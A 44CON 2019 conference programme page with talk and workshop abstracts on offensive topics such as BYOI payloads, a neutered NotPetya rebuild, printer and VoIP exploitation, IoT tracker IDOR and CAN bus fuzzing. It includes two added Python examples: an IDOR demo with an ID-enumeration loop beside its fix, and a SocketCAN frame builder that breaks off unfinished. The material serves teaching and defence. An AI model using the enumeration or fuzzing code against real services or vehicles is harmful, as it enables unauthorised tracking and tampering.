44CON Village Hall Track

The village hall is a new space we’re using to run a semi-unconference track. This is a space for community sponsors, regular sponsors, backup speakers and other people we invite to run workshops, activities and other sessions outside of the CFP process. Think of it as a vendor hall track without the infosuck, and sometimes without the vendors too. This section will be updated as activities are added.

44CON Mental Health Village

The Mental Health Hackers are running a Mental Health Village, which will feature various talks and activities. The following talks are being run within the Mental Health Village. J. Wolfgang Goerlich’s talk is a Mental Health Village talk, but is currently scheduled for Track 2, so is not shown here.

4G to 5G – Cellular Security Myths and the Reality

To date cellular technology has been about delivering a small number of services to end users. The advent of 5G will introduce not only new end user services but also a number of new paradigms that mobile operators will have to implement. With the reduction in cost of software defined radios and freely available mobile technology stacks, the barrier to entry into mobile technology hacking has never been lower. That said, there are still a number of myths and misconceptions with regards to mobile security, and this will only get worse as additional end user services are released.

During this presentation we will walk through a number of key topics including 4G security, IMSI catchers, 5G services, 5G security and the adversaries that an end user can face.

Please note, this talk will not be filmed.

Matt Summers, AON

Matt didn’t submit a bio, but being half-man, half-machine we didn’t expect him to. Sent back from the future to protect John Connor from an army of advanced shape-shifting cyborgs, Matt decided the best way to fulfil his mission was to get involved in founding BSides London. After this, he fought a T-1000 unit in a steel mill, and a shape shifting Terminatrix as he tried to stop judgement day. Lately, Matt has been exploring the world of 5G, and the insides of several cybernetic infiltration units.

BYOI (Bring Your Own Interpreter) payloads: Fusing the powah of .NET with a scripting language of your choosing

Offensive PowerShell tradecraft is in “Zombie Mode”: it’s sorta dead, but not entirely. With all of the defenses Microsoft has implemented in the PowerShell runtime over the past few years, Red Teamers / Pentesters & APT groups have started to shy away from using PowerShell based payloads/delivery mechanisms and migrate over to C#. However, C# is a compiled language, and operationally this has a few major downsides: we can’t be as “flexible”, setting up a proper development environment has overhead and can be time consuming, you have to compile all the things all the time, etc. Bottom line is I’m lazy and creating your malwarez/custom payloads in C# is not as easy & straightforward as it would be in PowerShell or really any scripting language.

This raises the following quandary: can we somehow get our own scripting language interpreter on the target machine while still remaining opsec safe and use it to perform all of our post-exploitation activities?

Turns out by harnessing the sheer craziness of the .NET framework, you can embed entire interpreters inside of .NET languages, allowing you to natively execute scripts written in third-party languages (like Python) on Windows! Not only does this allow you to dynamically access all of the .NET API from a scripting language of your choosing, but it also allows you to still remain completely in memory and has a number of advantages over traditional C# payloads! Essentially, BYOI payloads allow you to have all the “power” of PowerShell, without going through PowerShell in any way!

In this talk we will be covering some key .NET framework concepts in order to understand why this is possible, how to actually do the interpreter/engine/runtime embedding, the concept (that I coined) “engine inception”, differences between traditional C# payloads & BYOI payloads, demoing some examples of BYOI payloads and finally SILENTTRINITY: an open-source C2 framework that I’ve written that attempts to weaponize some of the BYOI concepts.

Marcello Salvati, BlackHills Information Security

“Marcello Salvati (@byt3bl33d3r) is a Security Analyst at BlackHills Information Security by day and by night a tool developer who discovered a novel technique to turn tea, sushi, alcohol and dank memes into somewhat functioning code. His passions include anything Active Directory related, trolling people on GitHub and developing open-source tools for the security community at large which he’s been doing for the past several years, some of his projects include SilentTrinity, CrackMapExec, DeathStar, RedBaron and many more.

He’s also really good at writing bios. I know, at this point you’re probably asking yourself: “Wait, how good of a bio writer is this guy? I need a quantifiable metric in order to come to a conclusion! The suspense is killing me!”. Well John Strand hired him so that he could continue to write them. Yeah… that’s how good. Checkmate Atheists! *dab* *mic drop*”

Cold War Cryptography

The use of cryptography during the Cold War is a fascinating, yet still little researched topic. Though most is still classified, a considerable amount of information about Cold War encryption has become public over the last two decades. The purpose of this talk is to tell the five or six most stunning crypto stories from the Cold War era in an entertaining, yet informative way. Like always, the speaker will use Lego models, self-drawn cartoons and similar means to support his speech.

Klaus Schmeh

Klaus Schmeh has published 16 books, 200 articles, 1,000 blog posts and 25 research papers about encryption technology, which makes him the most-published cryptology author in the world. While he writes his blog in English, most of his other publications are in German. Klaus Schmeh is the world’s leading blogger in the field of crypto history (www.schmeh.org).

In his main profession as a security consultant at the German company cryptovision, Klaus utilizes his special skill in explaining complex technical topics, often using self-drawn cartoons and Lego brick models for visualization. As an award-winning member of the public speaking club Toastmasters, he is an excellent speaker and frequent lecturer. He has hosted presentations at more than 200 conferences in Europe, Asia, and the USA. His presentations at 44CON, RSA Conference, TrusTech, NSA Crypto History Symposium, HistoCrypt, Charlotte International Cryptologic Symposium and other major events were enthusiastically received because of their clarity and because of Klaus’ engaging presentation style.

Dial V for Vulnerable: Attacking VoIP Phones

More and more everyday objects become “smart” and get connected to the internet. VoIP phones are among the oldest class of smart devices. Despite new phones being constantly released, most of these devices contain cheap hardware components and badly programmed software. Their state of security is often questionable, or worse. We show that most phones suffer from serious security flaws that allow attackers to gain full control of these devices. Such hijacked devices not only allow the attacker to eavesdrop on all communication, but can serve as an entry point for further attacks into the internal networks they are connected to.

VoIP phones can be found on every enterprise desk, in critical infrastructure buildings, at home and in other places where phone communication is required. Therefore, security flaws in such a device can have far-reaching consequences, especially when transmitting sensitive or private information. We present critical vulnerabilities and various classes of security flaws that allow an attacker to fully compromise the respective device. We were able to cause a denial of service, to eavesdrop on conversations, and to gain remote code execution on the phone.

In our investigation, we focused on the web-based user interface that most phones provide for configuration and management purposes. We present different test setups for analyzing the software running on those phones, including emulation and live debugging. Furthermore, we reveal strategies and tools for finding these flaws.

To complete the presentation, we compare our manually detected vulnerabilities to results of different automated firmware security analysis systems. As we show, automated scanners are unable to find most of these vulnerabilities and leave systems widely unprotected.

Philipp Roskosch

Philipp is a security researcher in the Secure Software Engineering department at Fraunhofer SIT (Germany). His research interests center on static and dynamic security analysis in the area of mobile apps and IoT devices. Besides research, he is a penetration tester in the same field. In his spare time, he enjoys hacking as a member of TeamSIK.

Stephan Huber

Stephan is a security researcher at the Testlab mobile security group at the Fraunhofer Institute for Secure Information Technology (SIT). His main focus is Android application security testing and developing new static and dynamic analysis techniques for app security evaluation. He has found various vulnerabilities in well-known Android applications and the AOSP. He has given talks at conferences such as DEF CON, HITB, AppSec and VirusBulletin. In his spare time he enjoys teaching students Android hacking.

EternalGlue – Rewriting NotPetya for corporate use

NCC Group had a large corporate client that was interested in how their production network would be impacted if they had been hit by the NotPetya worm. Cedric and Aaron ended up reverse engineering NotPetya and building a custom version with all the ransomware/destructive capabilities pulled out, and plugged it inside new logic to limit how it spreads. This allowed client-defined parameters to dictate where it could propagate and also allowed infections to transmit telemetry information back to a central server to allow visibility into how and where it spread.

After providing the client with the tool, they went through a three-phase approach of ensuring that the simulated worm actually behaved as expected, with the final phase being them running it within their corporate production environment. This allowed them to observe how the real threat would’ve spread, highlighted some important mitigations already in place, as well as highlighting areas of their network they didn’t anticipate to be affected, etc.

Cedric and Aaron will discuss the work involved in reverse engineering NotPetya, the logic introduced to ensure safe and controlled propagation, some of the technical hurdles encountered, basic AV bypassing required, the lab environment used for testing, etc. James will discuss his experience from the client’s perspective and what was involved in convincing such a large organization to get on board with running such a tool in a production environment.

This opens up a new phase of development and tooling opportunity for the defense industry. It allows us to much more closely mimic real-world scenarios in a controlled fashion and allows different and arguably more realistic visibility into the effects of such real-world attacks, versus more traditional consulting approaches.

Please note, this talk will not be filmed.

Aaron Adams, NCC Group

Aaron works in NCC Group’s Exploit Development Group. He has been doing reverse engineering / exploit development / code review for 15+ years. For some reason he is particularly fond of heaps.

Cedric Halbronn, NCC Group

Cedric (@saidelike) joined NCC Group in 2015 and has been doing reverse engineering / exploit development for 10+ years. His current interests are memory corruption bugs in the Windows kernel, HP iLO, mobile devices, embedded devices, etc.

James Fisher

For the last 6 years James has been responsible for defending a large global network against technically minded adversaries; prior to this he spent 11 years as a senior penetration tester, 6 of which as a CHECK team leader.

Hunting for bugs, catching dragons

While browser and plugin exploits are frequent, it’s less common to see exploits affecting targets without scripting capabilities. Are these worth attacking? How do we proceed? How do we identify valid entry points and bugs? This talk will cover some research done at Microsoft on Outlook and Exchange and discuss the results. Scary dragons will be spotted in this tour; hopefully you’ll catch some too.

Nicolas Joly

Nicolas Joly is a security engineer at the MSRC in Cheltenham. He has more than 10 years of experience in reverse engineering and vulnerability discovery, and is now focused on finding and exploiting bugs at Microsoft. Prior to this, he used to hunt bugs for bounties and won Pwn2Own several times with Vupen Security.

I’m unique, just like you: Human side-channels and their implications for security and privacy

Almost everything about us – our handwriting, DNA, faces, voices, fingerprints, even our eyes – can be used to distinguish us from the seven billion other people on the planet. These physical identifiers can allow law enforcement to trace back real-world crimes to offenders, and enable biometric authentication mechanisms. However, such identifiers are often irrelevant when it comes to attempting to track or disrupt threat actors.

In this talk, I will discuss, explore, and explain identifiers which are unintentional, non-physical, and generated as a result of human behaviours and activities, but which can still be used to uniquely identify and/or track individual users in the digital realm. I call these identifiers “human side-channels”, and will explore how they work; how they can be used for both attack and defence; and how they can be countered.

I’ll examine three human side-channels in particular: forensic linguistics; behavioural signatures; and cultural references. I will start by exploring the theories underpinning these side-channels, which are rooted in personality psychology and the concepts of consistency and distinctiveness as a result of our unique experiences, training, and feedback. I’ll then explore how they work; walk through case studies and examples/demos of using them practically in security contexts; and discuss how they could be practically applied to investigate and track threat actors, in situations ranging from hostile social media profiles to post-compromise exfiltration and privilege escalation.

I’ll also examine the privacy implications of each technique, and how such characteristics – which are much harder to recognise, obfuscate, or spoof – could be used to erode privacy. I’ll go into detail regarding possible countermeasures to disguise your own human side-channels, and I’ll wrap up by outlining some ideas for future research in these areas.

Matt Wixey, PWC

Matt is the Research Lead for the PwC Cyber Security practice in the UK, and is a PhD candidate at University College London. Prior to joining PwC, Matt led a technical R&D team for a law enforcement agency in the UK. His research interests include antivirus and sandboxing technologies, unconventional attack vectors, side-channels, and radio security.

Making something out of something – adventures in bringing electronics to the dark side

This talk relates to software and hardware modification of existing consumer electronics in order to give them features that could be relevant in a security context. It mainly focuses on techniques for identifying the potential for a device to be modified, and techniques for doing so, with a large number of varying demos to back it up.

The first device modification will be the NX301 handheld OBD-II reader. This device in particular was chosen due to its locked chip, encrypted firmware updates and the board’s capabilities, in particular the STM32 MCU, which could be used for connection to various peripherals. The talk will then outline the current features, and the features that could potentially be added to it. The most important of these will be discussing how, due to the STM32 chip used on the board, it would be possible to turn this device into a handheld USB rubber ducky, with an LCD screen menu and interface. The talk will then discuss how the device was selected for reverse engineering among a large number of potential devices.

The talk will then move onto another device, the WS-6933 satlink detector. This device was found to have a similar microcontroller to the previous device; however, it has some limitations that meant it could not be used for the same purpose, though it could be used for a different one. Various modification techniques will be discussed in depth.

These techniques will be performed on a third device, a 2.4GHz RF module used by radio controlled planes. This device was briefly touched upon in my talk last year, “Pwning the 44CON Nerf Tank”, but in this instance will be used in order to show how USB access can be provided to all four radio chipsets on the device, providing a powerful interface for interacting with their specific protocols. This will cover more details of debugging in environments where it is not always possible. This will be briefly touched upon as similar work has been covered in other talks, but it can demonstrate useful techniques.

A children’s toy will then be demonstrated with custom firmware to perform functions different from what was intended. This will outline the disassembly and analysis of the device, and point out how large amounts of the technology involved in creating a smart children’s toy are the same as in a more serious piece of equipment, and also outline the same vulnerabilities. This section of the talk will largely be for entertainment value, but will show how anything can be converted into a useful device with a sufficient amount of knowledge and effort.

The last demo will be of what can be done when hardware changes are made to devices. We will demonstrate how, by adding a few additional components and a tuned coil to the back of the OBD-II reader, the device can be modified in order to perform the functions of an NFC device, specifically a Mifare Classic NFC tag, with all of the features necessary to emulate and exploit the device. This will show how desirable modifications can be made to the hardware on the device in order to increase its capabilities, and demos with some NFC exploits will accompany this.

Chris Wade, Pen Test Partners

Chris is a seasoned security researcher and consultant. His main focuses are in reverse engineering hardware, fingerprinting USB vulnerabilities and playing with Software Defined Radios, with his key strength lying in firmware analysis, which he utilises as part of the hardware testing team at Pen Test Partners.

The security of common enterprise infrastructure devices such as desktops and laptops has advanced over the years through incremental improvements in operating system and endpoint security. However, security controls for network devices such as enterprise printers are often ignored and thus present a greater potential for exploitation and compromise by threat actors seeking to gain a persistent foothold on target organisations.

In order to assess the current state of mainstream enterprise printer product security and to challenge common assumptions made about the security of these devices, which sit on key parts of enterprise networks and process sensitive data, we set out on a vulnerability and exploitation research project of six known vendors. We were able to find remote vulnerabilities in all printers tested through various attack vectors, revealing a large number of 0-day vulnerabilities in the process.

In this talk we walk through the entire research engagement, from initial phases such as threat modelling to understand printer attack surfaces, to the development of attack methodologies and fuzzing tools used to target printer-specific protocols and functions. Besides highlighting the important vulnerabilities found and their respective CVEs, proof of concept exploits showing how it is possible to gain full control of printers and all of the data they manage will be presented. This will show how enterprise printers can be used as a method of persistence on a network, perhaps to exfiltrate sensitive data or support C2 persistence on Red Team engagements.

We also address a number of challenges that researchers can face when performing vulnerability research on devices such as printers and how we used different techniques to overcome these challenges, working with limited to no debugging and triage capabilities. We also present mitigations that printer manufacturers can implement in order to reduce printer attack surfaces and render exploitation more difficult.

Daniel Romero, Managing Security Consultant, NCC Group

Daniel is currently a security consultant and researcher at NCC Group. During his career he has worked on interesting security projects, always trying to “break” as much as possible. In the last years Daniel has mostly been focused on embedded devices / IoT and everything that surrounds them, such as hardware, code review, reverse engineering, fuzzing or exploiting.

Mario Rivas, Senior Security Consultant, NCC Group

Mario is a penetration tester and security consultant at NCC Group in Madrid. His interests revolve around all areas of computer security, always trying to learn new things, and he especially enjoys writing tools during the process to make his life a bit easier.

One Person Army – Playbook on how to be the first Security Engineer at a company

How often have you heard that ‘Early stage startups don’t care much about Security because if there is no product, there is nothing to secure?’ Although there is merit in the argument that startups need to build product so as to sustain and grow, it often puts the person in charge of securing them in a tricky position. For most startups, this person is the first Security Engineer, who can be somewhere between the 10th and 300th employee. By the time the first Security Engineer is on-boarded, the attack surface has usually become quite large and he or she faces an uphill battle to go about securing the organization. In such cases, the Security Engineer needs to perform as a ‘one-man army’ keeping the attackers at bay. In this talk, I will present a playbook on how to perform as one.

In this presentation, I will talk about the Startup Security methodology which has served me very well in starting, building and growing Security teams at various startups. The focus and goals include :-

I will also recount war stories from experiences including mine from when I was the first AppSec Engineer at Duo Security (acquired by Cisco), was a founding engineer at Elevate Security and started the Security team at MileIQ (acquired by Microsoft), and those of my colleagues who have been in similar shoes.

Kashish Mittal, MileIQ

Kashish Mittal is a Security Researcher and Engineer. He is currently the Head of Security at MileIQ, a Microsoft startup. He has worked for companies such as Elevate Security, Duo Security, Bank of America, Deutsche Bank etc. By choice, he is an ethical hacker and an addicted CTF player. He is a member of PPP (CMU’s elite CTF group). Prior to joining Duo, he did Security Research at Cylab, Pittsburgh. He has a BS and an MS from Carnegie Mellon University with a focus on Security. He is passionate about delivering Security awareness and training for employees, college students, high schoolers etc. He has been invited to present his research and work at various national and international Security conferences.

Outsourcing global cyber norms? The case for a multilateral collaboration model for the development and enforcement of rules for responsible behaviour in cyberspace

Traditional mechanisms of international rule-making have failed to drive forward globally accepted norms of responsible behaviour in cyberspace. The private-sector led initiatives that have sprung up in their place thus far fail to consider how threats to state powers and control will be contained. The only way to break the current impasse is through new ways of working.

The presentation will make the case for a model of multilateral collaboration, de facto outsourcing responsibility for international cyber norms development to a differently incentivised private sector while ensuring states maintain responsibility for norms enforcement.

It will test the assumption that a model of this kind has not yet been successfully applied, assessing three recent cyber norms initiatives – Cybersecurity Tech Accord; Charter of Trust; Paris Call for Trust and Security in Cyberspace – against five factors before drawing practically focused conclusions, looking at the success factors for adoption of the proposed multilateral collaboration model, and setting out how business and government practices would have to change.

Katharina Sommer, Head of Public Affairs, NCC Group

Seeking to act as an interpreter between technical and policy communities, Kat leads the Group’s political engagement, government relations and lobbying work, educating policy-makers on cyber security and internal audiences on political developments and priorities, and shaping the business’s operating environment. She is also training as a technical security consultant, working through the Group’s graduate programme at her own pace.

Kat has an international understanding, having studied in Germany and the Netherlands and worked in Argentina, Brussels and Strasbourg before settling in the UK just over ten years ago. She takes a keen interest in the way the public and private sectors collaborate to improve cyber resilience, and is currently working on a campaign to make the UK’s Computer Misuse Act fit for the 21st century. She is equally passionate about the global trends that inform how governments and businesses respond to cyber security challenges in an ever evolving interconnected world. In the last year, Kat has looked at emerging trends in multi-level cyber diplomacy, and challenged the future agenda of the World Economic Forum’s Global Centre for Cybersecurity.

And with a third degree black belt in Tae Kwon Do, Kat is not just a cyber ninja…

Security Research Teams – How to manage, grow and retain them

Security research teams are one of the important partners in any security organization and are usually found through an external company or through an internal group. Such teams are needed to secure your products, your network, and your business resources.

Managing and measuring such intangibles as “Security research” is a difficult problem, mainly revolving around the need to discover and fix issues before they reach the field and cause actual harm. Measuring or defining KPIs for such teams is problematic as research has no firm boundaries or guarantees.

Access to such talent is crucial in today’s world and many companies are looking into hiring and growing such internal teams. Hiring security research talent, retaining them and helping them to provide high business ROI is very difficult.

Over my career, I helped build and grow security research teams in large corporates and in start-up environments, and I will share some of my experience and advice for managing such teams.

In this talk, I will cover some basic lay of the land, some KPIs that can be used to measure success and advice on how to retain and guide such teams.

Spyware, Ransomware and Worms. How to prevent the next SAP tragedy

It is no secret that SAP is a market leader and one of the principal providers of core business applications around the world. Nearly 95% of the Fortune 500 companies rely heavily on SAP to perform their most critical daily operations such as processing payroll and benefits, storing sensitive customer information, handling credit cards, logistics and many more.

Due to the “ERP Complexity of the simple things”, in combination with several proprietary protocols, entry-points and default misconfigurations, ERPs are particularly vulnerable to Spyware, Ransomware and Worms, making them the ideal targets for these types of attacks due to the economic significance that these systems hold.

Join me for this completely new and highly technical talk, in which I’m going to explain through several live demos how the different types of malware could impact SAP and what actions you could take to prevent the next SAP tragedy.

As an added value, we will reveal for the first time our very own project “ARSAP”, a semi-automatic mechanism that detects and registers all the SAP systems that are exposed to the Internet, extracting the systems’ metadata and cataloguing the assets based on their geo-location, system type, version, installed components, etc.

Jordan Santarsieri, Vicxer

Mr Santarsieri is a founding partner at Vicxer, where he utilizes his 12+ years of experience in the security industry to bring top notch research into the ERP (SAP / Oracle) world.

He is engaged in a daily effort to identify, analyze, exploit and mitigate vulnerabilities affecting ERP systems and business-critical applications, helping Vicxer’s customers (Global Fortune-500 companies and defense contractors) to stay one step ahead of cyber-threats.

Jordan has also discovered critical vulnerabilities in Oracle and SAP software, and is a frequent speaker at international security conferences such as Black-Hat, Insomnihack, YSTS, Auscert, Sec-T, Rootcon, NanoSec, Hacker Halted, OWASP US, 8dot8, DragonJAR and Ekoparty.

Throw Open The Gates: Trading Control for Visibility

As many enterprises shift to a cloud first business model, asset visibility can become increasingly difficult for security. Cumbersome gated approval processes, a security mainstay for years, are now quickly bypassed in the name of developer agility and growth. Security practitioners need new approaches that move at the pace of this new DevOps driven world.

In this session, we will tell the story of a simple premise: can we discard a cumbersome approval process, throw open the gates, and build visibility for security by offering free “backdoored” server resources to developers? We’ll share the context that led to our premise, the tooling we built to facilitate the experiment, our success criteria, 3 years of practical experience running the program, and lessons learned.

Kyle Tobener, Salesforce

Kyle Tobener is a Director of Enterprise Security at Salesforce. He began his professional career as a zoologist but fled the jungle to return to San Francisco and focus on tech. His specialty now is application security, with a side dish of 3rd party vetting and contract negotiation. In his free time he collects cyberpunk paintings, runs the largest board game Meetup in San Francisco, and teaches his daughter to break things.

Alessandro Lapucci

Alessandro is a Lead Software/Security Engineer with Security Compliance at Salesforce, where he develops internal automation tools and customer facing web applications. Born and raised in Italy, he lived in Ireland and California before recently moving to Switzerland. When he isn’t glued to a computer screen, he spends time playing vinyl records and learning to fly racing quadcopters.

The billion dollar IoT attack no one knows about

What would you do if you knew you could exploit 20 million plus IoT devices? Denial of service? Old hat. Power grid manipulation? Boring! What about making a billion dollars? Many IoT tracking devices now use cellular data networks to communicate with servers allowing owners to track and interact in near real time with their devices. Which is great, but is that opening another avenue for attack?

Sometimes it feels we are going backwards in IoT security: along with the obvious wireless attacks, the rooting of the latest must-have sex toy and the very public exposure of undocumented services on Shodan, we have seen countless compromises being performed by simple logic flaws. Insecure Direct Object References (IDOR) are commonly used in attacks that look to compromise the web service to take over the end user account. They are most often found in the rush to deliver new devices, usually from the companies playing catch up with their outsourced development team. These logic flaws allow the attacker to perform functions as the user, such as remotely unlocking, starting and stealing your car or tracking your kids in real time. Great, so money made, move on, right? Well, there are many problems with stealing a car or kidnapping a child for ransom: not least, you might easily get arrested; moving stolen goods, especially high value stolen goods, is harder than you think; and let’s be honest, a kidnapping and ransom is not a good look for anyone. But are we missing a trick?

In this talk we will look at connected tracking devices and show examples of how simple logic flaws are being repeated time and time again across multiple devices. We will show how manufacturers and developers are white-labelling vulnerable APIs and selling them on to multiple tracking device companies, magnifying the issue millions of times over to unsuspecting victims around the world.

However, where IDOR is well known, what is not is a new technique of abusing these logic flaws for financial gain. So far unused by malicious hackers, it can easily be used to turn 20 million tracking devices into nearly a billion dollars, all without the manufacturers, and possibly the owners, knowing anything about it. We will show how trivial it is to exploit, how the attack can be instigated worldwide in seconds to immediately start making money, and how it can be repeated time and time again with little or no repercussions.
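The IDOR pattern the abstract describes, as an added example (not code from the talk or from any tracker vendor): a tracking API handler that authenticates the session but never authorises the object, beside the hardened version that scopes every lookup to the caller's own devices. The users, device IDs and coordinates are constructed for the example, and `enumerate_ids` plays the attacker walking a sequential ID space with one valid account.

```python
"""Added example for the abstract above (not code from the talk or from any
tracker vendor): an IDOR in a tracking API beside the authorised version.
The users, device IDs and coordinates are constructed for the example."""
from dataclasses import dataclass
from typing import Callable, Iterable, List, Tuple


@dataclass
class Tracker:
    device_id: str
    owner: str
    lat: float
    lon: float
    locked: bool = True


# Constructed stand-in for the vendor's database. The IDs are sequential on
# purpose: that is what makes walking the whole fleet cheap.
DEVICES = {
    "1001": Tracker("1001", "alice", 51.50, -0.12),
    "1002": Tracker("1002", "bob", 48.85, 2.35),
    "1003": Tracker("1003", "carol", 40.71, -74.01),
}


class NotFound(Exception):
    pass


def location_vulnerable(session_user: str, device_id: str) -> Tuple[float, float]:
    """IDOR: the session is authenticated, but the object reference is never
    authorised, so any logged-in user can read any device by guessing its ID."""
    dev = DEVICES.get(device_id)
    if dev is None:
        raise NotFound(device_id)
    return (dev.lat, dev.lon)


def _owned_device(session_user: str, device_id: str) -> Tracker:
    """Authorise the object, not just the session. 'Absent' and 'not yours'
    both raise NotFound so the API never confirms which IDs exist."""
    dev = DEVICES.get(device_id)
    if dev is None or dev.owner != session_user:
        raise NotFound(device_id)
    return dev


def location_hardened(session_user: str, device_id: str) -> Tuple[float, float]:
    dev = _owned_device(session_user, device_id)
    return (dev.lat, dev.lon)


def unlock_hardened(session_user: str, device_id: str) -> bool:
    """The same check guards the write path (remote unlock): that is the call
    that turns a location leak into a stolen vehicle. Returns True once unlocked."""
    dev = _owned_device(session_user, device_id)
    dev.locked = False
    return True


def enumerate_ids(session_user: str,
                  handler: Callable[[str, str], Tuple[float, float]],
                  ids: Iterable[str]) -> List[str]:
    """What the attacker does: walk the ID space with one valid session and
    keep every ID that answers. Against the hardened handler only the
    attacker's own device comes back."""
    hits = []
    for device_id in ids:
        try:
            handler(session_user, device_id)
            hits.append(device_id)
        except NotFound:
            continue
    return hits


if __name__ == "__main__":
    candidates = [str(i) for i in range(1000, 1010)]
    print("vulnerable:", enumerate_ids("alice", location_vulnerable, candidates))
    print("hardened:  ", enumerate_ids("alice", location_hardened, candidates))
```

The ownership check lives in one helper so the read path (location) and the write path (unlock) cannot drift apart, and a device that exists but belongs to someone else is reported exactly like one that does not exist, which denies the enumeration its oracle.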

Tony Gee, Pen Test Partners

Tony has over 14 years of security experience. He has worked as an internal blue team consultant within the finance industry, for the technology partner behind the world-leading Oyster card system and, more latterly, as an external security tester and auditor.

Tony speaks the world over at technology events highlighting key risks with the internet of things, automotive and maritime, med tech and key payment systems.

Vangelis Stykas, Pen Test Partners

Vangelis Stykas is a backend engineer turned pentester. Having played around with bits and bytes for the past 30 years, he has hacked ships, cars and locks. He has a weak spot for breaking APIs and web stuff but hates building them.

As OS protection mechanisms become more and more sophisticated, most APT actors have moved away from traditional rootkits. Turla (aka Snake), one of the oldest espionage groups, known for major breaches including the US military, is a perfect example. Turla's developers moved on to complex userland malware such as a backdoor targeting Microsoft Outlook. This allows them to blend into normal network traffic, bypassing network security solutions almost as efficiently as the rootkit they used in the past. However, the Turla toolbox contains an undocumented and even more ingenious userland rootkit: LightNeuron.

LightNeuron specifically targets Microsoft Exchange email servers, one of the most critical assets in an organization. It provides almost full control over Microsoft Exchange with the ability to read, compose and send, and block emails. It has very flexible rules allowing its operators to spy on and to modify email content of specific people in compromised organizations. Additionally, it includes remote-control functionality entirely directed via inbound emails with commands hidden in PDF documents or JPG images thanks to a custom steganography technique. We also believe that a Linux variant, with the same capabilities, exists in the wild.

LightNeuron uses a previously unseen persistence technique: a Microsoft Exchange Transport Agent. In the Exchange architecture, Transport Agents operate at the same level as security products such as spam filters. Thus, LightNeuron’s C&C communications and data exfiltration cannot be detected by such products.

LightNeuron was used in recent attacks against diplomatic organizations in Eastern Europe and the Middle East, but we have evidence that Turla started using it in 2014.

This talk will provide a detailed analysis of LightNeuron and of this new persistence technique. We will also present a demo showing LightNeuron in action and discuss detection and remediation techniques.

This talk has been sadly cancelled due to travel issues.

Matthieu Faou, ESET

Matthieu Faou is a malware researcher at ESET where he specializes in targeted attacks. His main duties include threat hunting and reverse engineering of APTs. He finished his Master's degree in computer science at École Polytechnique de Montréal and at École des Mines de Nancy in 2016. In the past, he has spoken at multiple conferences including BlueHat, RECON, Virus Bulletin and Botconf.

Despite my best efforts in 2011, IBM/Trusteer Rapport is still doing the rounds in the UK banking community. Having concentrated on what were at that time OS X-related issues with only hints at the Windows issues, no one seemed to pick up the mantle to prove the remainder of Trusteer Rapport nothing more than snake oil. In the intervening years Trusteer have been hard at work improving their backdoors after their acquisition by IBM for a cool $1 billion in September 2013, quite the price to pay indeed. In this talk I'll cover the historical state of, what was, the macOS implementation, since a recent disclosure resulted in IBM/Trusteer fixing the issues by performing a simple 'rm -rf' of the kernel components (CVE-2018-1985), and the current state of play for the Windows components, the result of which is hopefully the 'rm -rf' of the Windows components.

Neil Kettle, Digit Labs

Neil was testing various writing products when he found a pair of special sunglasses. Wearing them, he saw the world as it really is: people being bombarded by media and government with messages like “Stay Asleep”, “No Imagination”, “Nobody got fired for buying IBM”. Even scarier is that he is able to see that some usually normal-looking people are in fact ugly aliens in charge of the massive campaign to keep Trusteer Rapport installed. At the very first 44CON he came to chew bubble gum and kick ass. In 2019 he’s back… And he’s all out of bubble gum.

Rebalance Every 10,000 Kilometers

Careers are long. Jobs are short. One day, things are going well and in balance. The next day, there's twenty hours of work to do. Pull back some and it is more of the same. The first half of the year, things were great. Then change came and chaos reigned and burnout followed. Pull back even further, and the demands of work and life over decades come into sharp relief. This session presents strategies to maintain your mental health over the long haul. Handle imposter syndrome and stress. Know when to stick it out, but recognize the signs when it is just not worth it. Fail and recover gracefully. Drawing on personal lessons and anecdotes from mentoring others, the presentation provides a career user manual.

J. Wolfgang Goerlich

J. Wolfgang Goerlich is an Advisory CISO with Duo Security. Prior to this role, he led IT and IT security in the healthcare and financial services verticals. Wolfgang has held VP positions at several consulting firms, leading advisory and assessment practices. Wolfgang regularly presents on the topics of security architecture and design, identity and access management, data governance, secure development life cycles, zero-trust security, and more.

The CISO’s Dilemma

Defending an enterprise is a balancing act. I have worked as an offensive testing vendor to several global organisations over 18 years. This talk explores the challenges that today’s CISOs face – the threat landscape, overall shortage of infosec expertise, the ever evaporating shelf life of infosec products and an increased burden of compliance requirements. I will share my experiences from working with highly effective CISOs and internal infosec teams and what it takes to function on the razor’s edge.

Saumil Shah

Saumil Shah is the founder and CEO of Net-Square, providing cutting edge information security services to clients around the globe. Saumil is an internationally recognized speaker and instructor, having regularly presented at awesome conferences like Deepsec, Blackhat, RSA, CanSecWest, PacSec, EUSecWest, Hack.lu, Hack-in-the-box and others. He has authored two books titled “Web Hacking: Attacks and Defense” and “The Anti-Virus Book”.

Saumil graduated with an M.S. in Computer Science from Purdue University, USA and a B.E. in Computer Engineering from Gujarat University. He spends his leisure time breaking software, flying kites, traveling around the world and taking pictures.

44CON 2019 Workshops

All workshops are two hours long unless otherwise specified. Some of these workshops require you to bring items to get the most out of them. All workshops are being filmed, although one will only contain slides and audio footage.

Car Hacking Village – CAN bus basics with hands on fuzzing

The 'Car Hacking Village' has a 'CAR in a box', which is most of the ECU components from a Peugeot 208. This is configured so that all the main dials on the vehicle work: speedo, rev counter, fuel gauge and temp gauge. This will allow attendees who get through the fuzzing part access to a complete vehicle to hack.

The workshop will consist of a short presentation on the history of CAN bus, the physical layer, the speeds, the data format and message IDs. Attendees will then have access to sets of instrument clusters (hopefully 10-12 sets) to fuzz, to try to work out which messages cause which parts of the cluster to work. Each cluster set will include a CAN bus adapter that can be used for the fuzzing.
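As an added example of the fuzzing stage described above (not the village's own tooling): the Linux SocketCAN frame layout, plus the two sweeps you actually run against a bench cluster, every 11-bit ID with a fixed payload to find the IDs the cluster listens to, then one byte at a time on a reacting ID to map bytes to gauges. The IDs and payloads below are arbitrary example values, not the Peugeot's real ones, and `send_frames` needs Linux with a live `canX` interface.

```python
"""Added example for the workshop above (not the village's code): pack and
unpack Linux SocketCAN frames and generate the ID sweep and byte walk used
when fuzzing an instrument cluster. IDs and payloads are arbitrary examples."""
import socket
import struct
from typing import Iterable, Iterator, Tuple

CAN_EFF_FLAG = 0x80000000   # set in can_id for 29-bit (extended) identifiers
CAN_SFF_MASK = 0x000007FF   # 11-bit standard identifier
CAN_EFF_MASK = 0x1FFFFFFF   # 29-bit extended identifier

# struct can_frame from <linux/can.h>: u32 can_id, u8 len, 3 pad bytes, u8 data[8]
CAN_FRAME_FMT = "=IB3x8s"
CAN_FRAME_LEN = struct.calcsize(CAN_FRAME_FMT)   # 16 bytes


def build_frame(can_id: int, data: bytes, extended: bool = False) -> bytes:
    """Return a classic CAN frame ready for send() on a SocketCAN raw socket."""
    if len(data) > 8:
        raise ValueError("classic CAN carries at most 8 data bytes")
    if extended:
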